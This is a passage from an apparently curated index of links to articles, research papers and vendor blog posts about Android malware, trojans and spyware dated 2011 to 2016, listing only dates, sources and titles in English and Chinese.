Apps](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/sex-sells-looking-at-android-adult-adware-apps/) - 2016.05 [mcafee] [Sex Sells: Looking at Android Adult Adware Apps](https://securingtomorrow.mcafee.com/mcafee-labs/sex-sells-looking-at-android-adult-adware-apps/) - 2016.05 [360] [Viking Horde恶意软件攻击安卓设备](https://www.anquanke.com/post/id/83897/) - 2016.05 [checkpoint] [Viking Horde: A New Type of Android Malware on Google Play | Check Point Software Blog](https://blog.checkpoint.com/2016/05/09/viking-horde-a-new-type-of-android-malware-on-google-play/) - 2016.05 [mcafee] [Phishing Goes Mobile: New Android Malware Hits Google Play](https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/fake-banking-app-android-malware/) - 2016.05 [sec] [一个异常体积的安卓恶意代码样本分析](https://www.sec-un.org/bugly-introduced-the-android-sdk-samples-of-malicious-code-analysis/) - 2016.05 [mcafee] [Android Malware Clicker.G!Gen Found on Google Play](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/android-malware-clicker-dgen-found-google-play/) - 2016.05 [mcafee] [Android Malware Clicker.G!Gen Found on Google Play](https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-clicker-dgen-found-google-play/) - 2016.04 [checkpoint] [In The Wild: Google Can’t Close the Door on Android Malware | Check Point Software Blog](https://blog.checkpoint.com/2016/04/22/in-the-wild-google-cant-close-the-door-on-android-malware/) - 2016.04 [trendmicro] [“Operation C-Major” Actors Also Used Android, BlackBerry Mobile Spyware Against Targets](https://blog.trendmicro.com/trendlabs-security-intelligence/operation-c-major-actors-also-used-android-blackberry-mobile-spyware-targets/) - 2016.03 [angelalonso] [Triada malware: hitting the android core system (part II)](http://blog.angelalonso.es/2016/03/triada-malware-hitting-android-core_22.html) - 2016.03 [pnfsoftware] [Deobfuscating Android Triada malware](https://www.pnfsoftware.com/blog/deobfuscating-android-triada-malware/) - 2016.03 [freebuf] [安卓恶意软件GMBot 2.0版本出现:售价比原版本贵三倍](http://www.freebuf.com/news/98651.html) - 2016.03 [angelalonso] [Triada malware: hitting the android core system (part I)](http://blog.angelalonso.es/2016/03/triada-malware-hitting-android-core.html) - 2016.03 [welivesecurity] [The security review: Android banking trojan poses as Flash Player](https://www.welivesecurity.com/2016/03/14/security-review-android-banking-trojan-poses-flash-player/) - 2016.03 [welivesecurity] [Android banking trojan masquerades as Flash Player and bypasses 2FA](https://www.welivesecurity.com/2016/03/09/android-trojan-targets-online-banking-users/) - 2016.03 [fortinet] [BdMir: New Android Malware Family Spotted by SherlockDroid](https://www.fortinet.com/blog/threat-research/badmirror-new-android-malware-family-spotted-by-sherlockdroid.html) - 2016.02 [freebuf] [被开启的潘多拉:安卓恶意软件GM Bot源代码被公开](http://www.freebuf.com/news/96811.html) - 2016.02 [securityintelligence] [Android Malware About to Get Worse: GM Bot Source Code Leaked](https://securityintelligence.com/android-malware-about-to-get-worse-gm-bot-source-code-leaked/) - 2016.02 [virusbulletin] [VB2015 paper: Will Android Trojans, Worms or Rootkits Survive in SEAndroid and Containerization?](https://www.virusbulletin.com/blog/2016/02/vb2015-paper-will-android-trojans-worms-or-rootkits-survive-seandroid-and-containerization/) - 2016.02 [paloaltonetworks] [New Android Trojan “Xbot” Phishes Credit Cards and Bank Accounts, Encrypts Devices f](https://unit42.paloaltonetworks.com/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/) - 2016.02 [duo] [Android Device Malware Spotted in Active Attacks](https://duo.com/blog/android-device-rooting-malware-spotted-in-active-attacks) - 2016.02 [arxiv] [[1602.04693] DroidNative: Semantic-Based Detection of Android Native Code Malware](https://arxiv.org/abs/1602.04693) - 2016.02 [heimdalsecurity] [Security Alert: Mazar BOT – the Android Malware That Can Erase Your Phone](https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/) - 2016.02 [myonlinesecurity] [New Doc 115 Sent from Yahoo Mail on Android – word doc malware](https://myonlinesecurity.co.uk/new-doc-115-sent-from-yahoo-mail-on-android-word-doc-malware/) - 2016.01 [freebuf] [安卓智能电视:恶意应用的新战场](http://www.freebuf.com/vuls/92671.html) - 2016.01 [360] [通过恶意App感染安卓智能电视](https://www.anquanke.com/post/id/83264/) - 2016.01 [securitygossip] [IntelliDroid: A Targeted Input Generator for the Dynamic Analysis of Android Malware](http://securitygossip.com/blog/2016/01/05/2016-01-05/) - 2016.01 [sjtu] [IntelliDroid: A Targeted Input Generator for the Dynamic Analysis of Android Malware](https://loccs.sjtu.edu.cn/gossip/blog/2016/01/05/2016-01-05/) - 2015.12 [freebuf] [揭秘:安卓木马是如何盗取用户手机银行的](http://www.freebuf.com/news/topnews/89176.html) - 2015.12 [paloaltonetworks] [Rootnik Android Trojan Abuses Commercial Rooting Tool and Steals Private In](https://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/) - 2015.11 [b0n1] [Android malware drops Banker from PNG file](https://lukasstefanko.com/2015/11/android-malware-drops-banker-from-png-file.html) - 2015.11 [b0n1] [Android malware drops Banker from PNG file](http://b0n1.blogspot.com/2015/11/android-malware-drops-banker-from-png.html) - 2015.11 [freebuf] [自我复制、跨平台型安卓恶意软件出现(附源码)](http://www.freebuf.com/news/85292.html) - 2015.11 [freebuf] [来自中国的秘密:预装木马的安卓平板正在销往全世界](http://www.freebuf.com/articles/terminal/85046.html) - 2015.11 [freebuf] [伪装成word的安卓恶意软件](http://www.freebuf.com/articles/83606.html) - 2015.11 [angelalonso] [Detecting bank trojans which steal 2FA token through the code (Android)](http://blog.angelalonso.es/2015/11/detecting-bank-trojans-which-steal-2fa.html) - 2015.10 [freebuf] [恶意色情软件攻击中国大陆、台湾、日本安卓用户](http://www.freebuf.com/news/83384.html) - 2015.10 [trendmicro] [Pornographic-themed Malware Hits Android Users in China, Taiwan, Japan](https://blog.trendmicro.com/trendlabs-security-intelligence/pornographic-themed-malware-hits-android-users-in-china-taiwan-japan/) - 2015.10 [securitygossip] [Rage Against the Virtual Machine: Hindering Dynamic Analysis of Android Malware](http://securitygossip.com/blog/2015/10/12/2015-10-12/) - 2015.10 [sjtu] [Rage Against the Virtual Machine: Hindering Dynamic Analysis of Android Malware](https://loccs.sjtu.edu.cn/gossip/blog/2015/10/12/2015-10-12/) - 2015.10 [freebuf] [Kemoge:一款影响超过20国的安卓恶意程序](http://www.freebuf.com/news/80876.html) - 2015.10 [freebuf] [伪装成PayPal的网银木马瞄准安卓用户](http://www.freebuf.com/news/80663.html) - 2015.09 [trendmicro] [New “Ghost Push” Variants Sport Guard Code; Malware Creator Published Over 600 Bad Android Apps](https://blog.trendmicro.com/trendlabs-security-intelligence/new-ghost-push-variants-sport-guard-code-malware-creator-published-over-600-bad-android-apps/) - 2015.09 [welivesecurity] [Android trojan drops in, despite Google’s Bouncer](https://www.welivesecurity.com/2015/09/22/android-trojan-drops-in-despite-googles-bouncer/) - 2015.08 [freebuf] [一个针对中国用户的安卓木马](http://www.freebuf.com/news/76231.html) - 2015.07 [trendmicro] [The Android Malware Problem](http://blog.trendmicro.com/the-android-malware-problem/) - 2015.07 [checkpoint] [Adware or APT – SnapPea Downloader - An Android Malware that implements 12 different exploits | Check Point Software Blog](https://blog.checkpoint.com/2015/07/10/adware-or-apt-snappea-downloader-an-android-malware-that-implements-12-different-exploits/) - 2015.07 [paloaltonetworks] [New Android Malware Family Evades Antivirus Detection by Using Popular Ad](https://unit42.paloaltonetworks.com/new-android-malware-family-evades-antivirus-detection-by-using-popular-ad-libraries/) - 2015.06 [tan6600] [安卓恶意代码分析](https://blog.csdn.net/tan6600/article/details/46689551) - 2015.05 [cert] [Malware attack on both Windows and Android](https://www.cert.pl/en/news/single/malware-attack-on-both-windows-and-android/) - 2015.04 [nsfocus] [剖析安卓木马Androrat(一)](http://blog.nsfocus.net/%e5%89%96%e6%9e%90%e5%ae%89%e5%8d%93%e6%9c%a8%e9%a9%acandrorat%ef%bc%88%e4%b8%80%ef%bc%89/) - 2015.04 [b0n1] [Android Trojan Spy goes 2 years undetected](http://b0n1.blogspot.com/2015/04/android-trojan-spy-goes-2-years.html) - 2015.04 [b0n1] [Android Trojan Spy goes 2 years undetected](https://lukasstefanko.com/2015/04/android-trojan-spy-goes-2-years-undetected.html) - 2015.04 [arxiv] [[1504.01693] Security Toolbox for Detecting Novel and Sophisticated Android Malware](https://arxiv.org/abs/1504.01693) - 2015.04 [trendmicro] [Android Installer Hijacking Bug Used as Lure for Malware](https://blog.trendmicro.com/trendlabs-security-intelligence/android-installer-hijacking-bug-used-as-lure-for-malware/) - 2015.03 [checkpoint] [CuckooDroid – Fighting the Tide of Android Malware | Check Point Software Blog](https://blog.checkpoint.com/2015/03/24/cuckoodroid-fighting-tide-android-malware/) - 2015.03 [securityintelligence] [MazelTov! More Android Malware Coming to a Mobile Device Near You](https://securityintelligence.com/mazeltov-more-android-malware-coming-to-a-mobile-device-near-you/) - 2015.03 [welivesecurity] [Fake Amazon gift cards offer only malware to Android devices](https://www.welivesecurity.com/2015/03/04/fake-amazon-gift-cards-offer-malware-android-devices/) - 2015.03 [sensecy] [Australian Banks Targeted by Russian Malware for Android Devices](https://blog.sensecy.com/2015/03/02/australian-banks-targeted-by-russian-malware-for-android-devices/) - 2015.02 [freebuf] [Google Play商店漏洞:黑客可远程在你的安卓手机上安装恶意APP](http://www.freebuf.com/news/59057.html) - 2015.02 [checkpoint] [New Android Trojans, Gremlins Inside Play, iPhone’s Safe and Sound - Mobile Security Weekly | Check Point Software Blog](https://blog.checkpoint.com/2015/02/13/new-android-trojans-gremlins-inside-play-iphones-safe-sound-mobile-security-weekly/) - 2015.02 [checkpoint] [Clever and Persistent Android Banking Trojan Discovered | Check Point Software Blog](https://blog.checkpoint.com/2015/02/05/clever-persistent-android-banking-trojan-discovered/) - 2015.01 [freebuf] [看我七十二变:HTML5游戏重打包变身安卓恶意软件](http://www.freebuf.com/news/55843.html) - 2014.12 [trendmicro] [Repackaging HTML5 Apps into Android Malware](https://blog.trendmicro.com/trendlabs-security-intelligence/repackaging-html5-apps-into-android-malware/) - 2014.12 [pnfsoftware] [Red October Malware for Android](https://www.pnfsoftware.com/blog/red-october-malware-for-android/) - 2014.12 [qq] [藏在海贼王小游戏背后的安卓木马](https://tav.qq.com/index/newsDetail/178.html) - 2014.11 [securelist] [Brazilian Trojan Bankers – now on your Android Play Store!](https://securelist.com/brazilian-trojan-bankers-now-on-your-android-play-store/67661/) - 2014.10 [virusbulletin] [The VB2014 presentation you never saw. Early launch Android malware: your phone is 0wned](https://www.virusbulletin.com/blog/2014/10/presentation-you-never-saw-early-launch-android-malware-your-phone-0wned/) - 2014.09 [checkpoint] [Chinese Android mRAT Spyware Targets Hong Kong Protest](https://blog.checkpoint.com/2014/09/30/chinese-government-targets-hong-kong-protesters-android-mrat-spyware/) - 2014.09 [malwarebytes] [Spyware installed on Android devices to stalk domestic abuse victims](https://blog.malwarebytes.com/cybercrime/2014/09/spyware-installed-on-android-devices-to-stalk-domestic-abuse-victims/) - 2014.09 [trendmicro] [Android Malware Use SSL for Evasion](https://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-use-ssl-for-evasion/) - 2014.08 [welivesecurity] [Krysanec trojan: Android backdoor lurking inside legitimate apps](https://www.welivesecurity.com/2014/08/12/krysanec-trojan-android/) - 2014.08 [cert] [Android RAT malware spreading via torrents](https://www.cert.pl/en/news/single/android-rat-malware-spreading-via-torrents/) - 2014.08 [vxsecurity] [[ Technical Tear Down: UUPlay, ANDROID Malware ]](http://www.vxsecurity.sg/2014/08/11/technical-tear-down-uuplay-android-malware/) - 2014.08 [mcafee] ['DHL' SMS Spam Distributes Android Malware in Germany](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/dhl-sms-spam-distributing-android-malware-germany/) - 2014.07 [mcafee] [‘DHL’ SMS Spam Distributes Android Malware in Germany](https://securingtomorrow.mcafee.com/mcafee-labs/dhl-sms-spam-distributing-android-malware-germany/) - 2014.07 [virusbulletin] [Paper: Obfuscation in Android malware, and how to fight back](https://www.virusbulletin.com/blog/2014/07/paper-obfuscation-android-malware-and-how-fight-back/) - 2014.07 [zairon] [Android Koler trojan: C&C part](https://zairon.wordpress.com/2014/07/01/android-koler-trojan-cc-part/) - 2014.06 [zairon] [Android Koler trojan: analysis driven by application components](https://zairon.wordpress.com/2014/06/26/android-koler-trojan-analysis-driven-by-application-components/) - 2014.06 [virusbulletin] [Cheap Android phone comes shipped with spyware](https://www.virusbulletin.com/blog/2014/06/cheap-android-phone-comes-shipped-spyware/) - 2014.06 [trendmicro] [Taiwan Hit With Micropayment Fraud via Android Malware](https://blog.trendmicro.com/trendlabs-security-intelligence/taiwan-hit-with-micropayment-fraud-via-android-malware/) - 2014.06 [welivesecurity] [Android malware: how to keep your device safe from filecoders (and everything else)](https://www.welivesecurity.com/2014/06/05/android-malware-how-to-keep-your-device-safe-from-filecoders-and-everything-else/) - 2014.06 [welivesecurity] [ESET analyzes Simplocker Android malware](https://www.welivesecurity.com/2014/06/04/simplocker/) - 2014.05 [welivesecurity] [Android spyware takes photos without users knowing](https://www.welivesecurity.com/2014/05/26/android-spyware-takes-photos-without-users-knowing/) - 2014.05 [checkpoint] [Security Alert: New Android Malware Spreading Aggressively - Read this FAQ. (Updated) | Check Point Software Blog](https://blog.checkpoint.com/2014/05/23/security-alert-new-android-malware-spreading-aggressively-read-faq-updated/) - 2014.05 [paloaltonetworks] [Funtasy Trojan Targets Spanish Android Users with Sneaky SM](https://unit42.paloaltonetworks.com/funtasy-trojan-targets-spanish-android-users-sneaky-sms-charges/) - 2014.05 [endgame] [Android Is Still the King of Mobile Malware](https://www.endgame.com/blog/technical-blog/android-still-king-mobile-malware) - 2014.04 [welivesecurity] [Android malware worm catches unwary users](https://www.welivesecurity.com/2014/04/30/android-sms-malware-catches-unwary-users/) - 2014.04 [sans] [Android Users - Beware of Bitcoin Mining Malware](https://isc.sans.edu/forums/diary/Android+Users+Beware+of+Bitcoin+Mining+Malware/18029/) - 2014.04 [paloaltonetworks] [Cardbuyer: New Smart Android Trojan Defeats Multi-factor Verification and Steals Prepaid G](https://unit42.paloaltonetworks.com/cardbuyer-new-smart-android-trojan/) - 2014.04 [virusbulletin] [AOL spam spreads 'NotCompatible' Android trojan](https://www.virusbulletin.com/blog/2014/04/aol-spam-spreads-notcompatible-android-trojan/) - 2014.04 [sophos] [Sophos at Infosecurity Europe 2014: Credit card crime, Android malware, and a look inside SophosLabs](https://news.sophos.com/en-us/2014/04/22/sophos-at-infosecurity-europe-2014-credit-card-crime-android-malware-and-a-look-inside-sophoslabs/) - 2014.04 [securelist] [New threat: Trojan-SMS.AndroidOS.Stealer.a](https://securelist.com/new-threat-trojan-sms-androidos-stealer-a/59384/) - 2014.04 [welivesecurity] [Android malware? Google will be watching your every move](https://www.welivesecurity.com/2014/04/10/bad-android-apps-google-will-be-watching-your-every-move/) - 2014.04 [sophos] [New research on Android, rootkits, and malware: SophosLabs papers accepted for Virus Bulletin 2014](https://news.sophos.com/en-us/2014/04/10/new-research-on-android-rootkits-and-malware-sophoslabs-papers-accepted-for-virus-bulletin-2014/) - 2014.04 [vxsecurity] [[ Technical Tear Down : First Android Tor Trojan ]](http://www.vxsecurity.sg/2014/04/07/technical-tear-down-first-android-tor-trojan/) - 2014.04 [sans] [Those strange e-mails with URLs in them can lead to Android malware](https://isc.sans.edu/forums/diary/Those+strange+emails+with+URLs+in+them+can+lead+to+Android+malware/17909/) - 2014.04 [mcafee] [Trojan Hides in ROM of Chinese Android Devices](https://www.mcafee.com/blogs/other-blogs/mcafee-labs/trojan-hides-rom-android-device/) - 2014.04 [mcafee] [Trojan Hides in ROM of Chinese Android Devices](https://securingtomorrow.mcafee.com/mcafee-labs/trojan-hides-rom-android-device/) - 2014.04 [sans] [Upgrading Your Android, Elevating My Malware](https://isc.sans.edu/forums/diary/Upgrading+Your+Android+Elevating+My+Malware/17885/) - 2014.03 [welivesecurity] [Stealth malware sneaks onto Android phones, then "turns evil" when OS upgrades](https://www.welivesecurity.com/2014/03/21/stealth-malware-sneaks-onto-android-phones-then-turns-evil-when-os-upgrades/) - 2014.03 [malwarebytes] [Research Paper Shows Upgrading Android Could Upgrade Malware](https://blog.malwarebytes.com/cybercrime/2014/03/research-paper-shows-upgrading-android-could-upgrade-malware/) - 2014.03 [trustlook] [Dendroid: Android Trojan Being Commercialized](https://blog.trustlook.com/2014/03/20/dendroid-android-trojan-commercialized/) - 2014.03 [securityintelligence] [DIY: Android Malware Analysis – Taking Apart OBAD (Part 2)](https://securityintelligence.com/diy-android-malware-analysis-taking-apart-obad-part-2/) - 2014.03 [welivesecurity] [Android phones and tablets ship “pre-infected” with malware](https://www.welivesecurity.com/2014/03/05/android-phones-and-tablets-ship-pre-infected-with-malware/) - 2014.02 [securelist] [The first Tor Trojan for Android](https://securelist.com/the-first-tor-trojan-for-android/58528/) - 2014.02 [techhelplist] [Some random Android malware that just showed up one day](https://techhelplist.com/spam-list/477-some-random-android-malware-that-just-showed-up-one-day) - 2014.02 [welivesecurity] [Android under assault as spyware and Trojans 'grow by 400%', company claims](https://www.welivesecurity.com/2014/02/20/android-under-assault-as-spyware-and-trojans-grow-by-400-company-claims/) - 2014.01 [] [安卓远控木马黑色产业链渐成气候,谨防手机变“肉鸡”](http://blogs.360.cn/post/rat-trojan.html) - 2013.12 [welivesecurity] [ESET’s Threat Trends Predictions 2014: The next battle for internet privacy, a new assault on Androids, and a new wave of hi-tech malware](https://www.welivesecurity.com/2013/12/17/esets-threat-trends-predictions-2014-the-next-battle-for-internet-privacy-a-new-assault-on-androids-and-a-new-wave-of-hi-tech-malware/) - 2013.12 [sophos] [Explaining botnets, exploit kits, Linux and Android malware (Podcast)](https://news.sophos.com/en-us/2013/12/12/security-threat-report-2014-explaining-botnets-exploit-kits-linux-and-android-malware-podcast/) - 2013.12 [welivesecurity] [Has-bean? Old Androids still on Jelly Bean can be "lock-picked" by malware](https://www.welivesecurity.com/2013/12/05/has-bean-old-androids-still-on-jelly-bean-can-be-lock-picked-by-malware/) - 2013.11 [christian] [TraceDroid: Dynamic Malware Analysis for Android](https://christian-rossow.de/articles/Tracedroid_Malware_Analysis.php) - 2013.11 [arxiv] [[1311.4201] Sound and Precise Malware Analysis for Android via Pushdown Reachability and Entry-Point Saturation](https://arxiv.org/abs/1311.4201) - 2013.11 [malwarebytes] [Android Trojan gets an update](https://blog.malwarebytes.com/cybercrime/2013/11/android-trojan-gets-an-update/) - 2013.11 [securelist] [The Android Trojan Svpeng Now Capable of Mobile Phishing](https://securelist.com/the-android-trojan-svpeng-now-capable-of-mobile-phishing/57301/) - 2013.10 [malwarebytes] [Trojan looks to “Wrob” Android users](https://blog.malwarebytes.com/cybercrime/2013/10/trojan-looks-to-wrob-android-users/) - 2013.10 [pediy] [Android.Trojan.Midown 的分析](https://bbs.pediy.com/thread-180176.htm) - 2013.10 [pediy] [Android-Trojan/Skullkey 分析](https://bbs.pediy.com/thread-180175.htm) - 2013.10 [securityintelligence] [DIY: Android Malware Analysis – Taking Apart OBAD (Part 1)](https://securityintelligence.com/diy-android-malware-analysis-taking-apart-obad-part-1/) - 2013.10 [pediy] [[翻译]Android Malware (SpringerBriefs in Computer Science) 第二章节](https://bbs.pediy.com/thread-179868.htm) - 2013.09 [malwarebytes] [Obad Trojan found in fake Android Google Play Store](https://blog.malwarebytes.com/cybercrime/2013/09/obad-trojan-found-in-fake-google-play/) - 2013.09 [quequero] [AndroidOS.Opfake.a malware analysis](https://quequero.org/2013/09/android-opfake-malware-analysis/) - 2013.09 [malwarebytes] [79 percent of mobile malware is directed at Android](https://blog.malwarebytes.com/cybercrime/2013/09/79-percent-of-malware-is-directed-at-android/) - 2013.08 [trustlook] [New Malware Alert: Parasites Android Malware](https://blog.trustlook.com/2013/08/28/new-malware-alert-parasites-android-malware/) - 2013.08 [krebsonsecurity] [Who Wrote the Pincer Android Trojan?](https://krebsonsecurity.com/2013/08/who-wrote-the-pincer-android-trojan/) - 2013.08 [krebsonsecurity] [A Closer Look: Perkele Android Malware Kit](https://krebsonsecurity.com/2013/08/a-closer-look-perkele-android-malware-kit/) - 2013.08 [trendmicro] [Russian cybercriminals turn Android malware into an industry](http://blog.trendmicro.com/russian-cybercriminals-turn-android-malware-industry/) - 2013.08 [trendmicro] [Master Key Android Vulnerability Used to Trojanize Banking App](https://blog.trendmicro.com/trendlabs-security-intelligence/master-key-android-vulnerability-used-to-trojanize-banking-app/) - 2013.07 [mcafee] [Android Master-Key Malware Already Blocked by McAfee Mobile Security](https://securingtomorrow.mcafee.com/mcafee-labs/android-master-key-malware-already-blocked-by-mcafee-mobile-security/) - 2013.07 [welivesecurity] [Android spyware “on rise” as snooper apps multiply](https://www.welivesecurity.com/2013/07/25/android-spyware-on-rise-as-snooper-apps-multiply/) - 2013.07 [welivesecurity] [Android malware attacks skyrocket in China](https://www.welivesecurity.com/2013/07/05/android-malware-attacks-skyrocket-in-china/) - 2013.06 [virusbulletin] [Compromised Yahoo! accounts continue to spread Android malware](https://www.virusbulletin.com/blog/2013/06/compromised-yahoo-accounts-continue-spread-android-malware/) - 2013.06 [nviso] [Step by step analysis of an Android malware sample](https://blog.nviso.be/2013/06/17/step-by-step-analysis-of-an-android-malware-sample/) - 2013.06 [trendmicro] [Cybercriminals Improve Android Malware Stealth Routines with OBAD](https://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-improve-android-malware-stealth-routines-with-obad/) - 2013.06 [cert] [Evolution of an Android malware: the story of a friend of ZitMo](https://www.cert.pl/en/news/single/evolution-of-an-android-malware-the-story-of-a-friend-of-zitmo/) - 2013.06 [cyberarms] [Obad is the Baddest Android Trojan on the Block](https://cyberarms.wordpress.com/2013/06/07/obad-is-the-badest-android-trojan-on-the-block/) - 2013.06 [securelist] [The most sophisticated Android Trojan](https://securelist.com/the-most-sophisticated-android-trojan/35929/) - 2013.06 [mcafee] [Phishing Attack Replaces Android Banking Apps With Malware](https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attack-replaces-android-banking-apps-with-malware/) - 2013.04 [citizenlab] [An Analysis of Android Malware Targeting Tibetans](https://citizenlab.ca/2013/04/permission-to-spy-an-analysis-of-android-malware-targeting-tibetans/) - 2013.03 [securelist] [Android Trojan Found in Targeted Attack](https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/) - 2013.03 [virusbulletin] [Spam link sends Android users to trojan proxy](https://www.virusbulletin.com/blog/2013/03/spam-link-sends-android-users-trojan-proxy/) - 2013.03 [welivesecurity] [Blogger: rogue developers hiding Android malware in apps on Google Play - We Live Security](https://www.welivesecurity.com/2013/03/11/rogue-developers-hiding-android-malware-in-apps-on-google-play/) - 2013.03 [sans] [Digital Forensics Case Leads: Email Scammers, Android Malware, DoS Against Banks, Tool Updates And A Few Good Reads.](https://digital-forensics.sans.org/blog/2013/03/10/digital-forensics-case-leads-email-scammers-android-malware-dos-against-banks-tool-updates-and-a-few-good-reads) - 2013.03 [mcafee] [Android Malware Goes Bollywood](https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-goes-bollywood/) - 2013.02 [arxiv] [[1302.7212] DroidAnalytics: A Signature Based Analytic System to Collect, Extract, Analyze and Associate Android Malware](https://arxiv.org/abs/1302.7212) - 2013.01 [cyberarms] [620,000 Android Phones in China hit by Most Costly Malware in History](https://cyberarms.wordpress.com/2013/01/31/620000-android-phones-in-china-hit-by-most-costly-malware-in-history/) - 2013.01 [trendmicro] [Android Malware Found to Send Remote Commands](https://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-found-to-send-remote-commands/) - 2013.01 [webroot] [Android malware spreads through compromised legitimate Web sites](https://www.webroot.com/blog/2013/01/22/android-malware-spreads-through-compromised-legitimate-web-sites/) - 2012.09 [sans] [Digital Forensics Case Leads: Giants are the biggest buyers, Freezing the cold-boot attack on disk encryption, dropping malware using the famous WhatsApp, Hacker get caught while chatting!!! IPOD, Android and SSDs, this week on Case Leadsâ¦](https://digital-forensics.sans.org/blog/2012/09/16/digital-forensics-case-leads-giants-are-the-biggest-buyers-freezing-the-cold-boot-attack-on-disk-encryption-dropping-malware-using-the-famous-whatsapp-hacker-get-caught-while-chatting-ipod-an) - 2012.08 [trendmicro] [164 Unique Android Adware Still Online](https://blog.trendmicro.com/trendlabs-security-intelligence/164-unique-android-adware-still-online/) - 2012.08 [trendmicro] [Android Malware Exploits China Mobile SMS Payments](https://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-exploits-china-mobile-sms-payments/) - 2012.07 [trendmicro] [DEFCON 2012: Android Malware in Luckycat Servers](https://blog.trendmicro.com/trendlabs-security-intelligence/defcon-2012-android-malware-in-luckycat-servers/) - 2012.07 [trendmicro] [Android Malware Family Downloads Paid Media and Apps](https://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-family-downloads-paid-media-and-apps/) - 2012.07 [trendmicro] [Android Malware: How Worried Should You Be?](https://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-how-worried-should-you-be/) - 2012.07 [pediy] [[原创]Trojan-Spy.AndroidOS.Zitmo.a病毒分析](https://bbs.pediy.com/thread-152939.htm) - 2012.06 [cert] [Android malware sending Premium SMS targeting Polish users](https://www.cert.pl/en/news/single/android-malware-sending-premium-sms-targeting-polish-users/) - 2012.05 [trendmicro] [Malware Masquerades as Flash Player for Android](https://blog.trendmicro.com/trendlabs-security-intelligence/malware-masquerades-as-flash-player-for-android/) - 2012.05 [mcafee] [Evolution of Android Malware: IRCBot Joins the Party](https://securingtomorrow.mcafee.com/mcafee-labs/evolution-of-android-malware-ircbot-for-android/) - 2012.05 [virusbulletin] [Android malware served via compromised websites](https://www.virusbulletin.com/blog/2012/05/android-malware-served-compromised-websites/) - 2012.04 [mcafee] [Android Malware Promises Video While Stealing Contacts](https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-promises-video-while-stealing-contacts/) - 2012.04 [forcepoint] [The Android "GoldDream" Malware Server is Still Alive](https://www.forcepoint.com/blog/security-labs/android-golddream-malware-server-still-alive) - 2012.04 [virusbulletin] [Android malware hides inside JPG image](https://www.virusbulletin.com/blog/2012/04/android-malware-hides-inside-jpg-image/) - 2012.03 [mcafee] [Android Malware Pairs Man-in-the-Middle With Remote-Controlled Banking Trojan](https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-pairs-man-in-the-middle-with-remote-controlled-banking-trojan/) - 2012.03 [sans] [New automated sandbox for Android malware](https://isc.sans.edu/forums/diary/New+automated+sandbox+for+Android+malware/12703/) - 2012.03 [mcafee] [Google Code Projects Host Android Malware](https://securingtomorrow.mcafee.com/mcafee-labs/google-code-projects-host-android-malware/) - 2012.02 [sans] [Digital Forensics Case Leads: Android Malware,Chrome Browser Bugs and IT guy shoots Daughters Laptop.](https://digital-forensics.sans.org/blog/2012/02/10/digital-forensics-case-leads-android-malwarechrome-browser-bugs-and-it-guy-shoots-daughters-laptop) - 2012.02 [quequero] [RootSmart Android Malware Analysis](https://quequero.org/2012/02/rootsmart-android-malware-analysis/) - 2012.02 [securelist] [Will Google Bouncer definitely remove all malware from the Android Market?](https://securelist.com/will-google-bouncer-definitely-remove-all-malware-from-the-android-market-4/31314/) - 2012.01 [talosintelligence] [Android.Counterclank: Malware or Adware?](https://blog.talosintelligence.com/2012/01/androidcounterclank-malware-or-adware.html) - 2012.01 [trustwave] [Android IRC Bot - This Ain't Your Granny's Android Malware (Or Maybe It Is)](https://www.trustwave.com/Resources/SpiderLabs-Blog/Android-IRC-Bot---This-Ain-t-Your-Granny-s-Android-Malware-(Or-Maybe-It-Is)/) - 2012.01 [trendmicro] [How Big will the Android Malware Threat Be in 2012?](https://blog.trendmicro.com/trendlabs-security-intelligence/how-big-will-the-android-malware-threat-be-in-2012/) - 2011.12 [securelist] [Android malware: new traps for users](https://securelist.com/android-malware-new-traps-for-users-11/31893/) - 2011.11 [lookout] [Android Trojan Aims to Make Money Through Premium Rate Text Message Charges](https://blog.lookout.com/android-trojan-aims-to-make-money-through-premium-rate-text-message-charges) - 2011.11 [securelist] [Does Android Malware Exist?](https://securelist.com/does-android-malware-exist/31621/) - 2011.11 [virusbulletin] [SMS trojan targets Android users in eight western countries](https://www.virusbulletin.com/blog/2011/11/sms-trojan-targets-android-users-eight-western-countries/) - 2011.11 [talosintelligence] [Android Malware Analysis: A How-To](https://blog.talosintelligence.com/2011/11/android-malware-analysis-how-to.html) - 2011.10 [aassfxxx] [Reverse de malware Android](http://aassfxxx.infos.st/article13/reverse-de-malware-android) - 2011.10 [trustwave] [NickiSpy.C - Android Malware Analysis & Demo](https://www.trustwave.com/Resources/SpiderLabs-Blog/NickiSpy-C---Android-Malware-Analysis--Demo/) - 2011.10 [mcafee] [Android Malware Spreads Through QR Code](https://securingtomorrow.mcafee.com/mcafee-labs/android-malware-spreads-through-qr-code/) - 2011.10 [welivesecurity] [Android vulnerability patch time lag causes malware opportunity](https://www.welivesecurity.com/2011/10/07/android-vulnerability-patch-time-lag-causes-malware-opportunity/) - 2011.10 [trendmicro] [Android Malware Uses Blog Posts as C&C](https://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-uses-blog-posts-as-cc/) - 2011.09 [securelist] [Malicious QR Codes Pushing Android Malware](https://securelist.com/malicious-qr-codes-pushing-android-malware/31386/) - 2011.09 [welivesecurity] [Android banking malware in the wild](https://www.welivesecurity.com/2011/09/16/android-banking-malware-in-the-wild/) - 2011.09 [mcafee] [Spitmo vs Zitmo: Banking Trojans Target Android](https://securingtomorrow.mcafee.com/mcafee-labs/spitmo-vs-zitmo-banking-trojans-target-android/) - 2011.08 [welivesecurity] [Android financial transactions on the rise - watch for 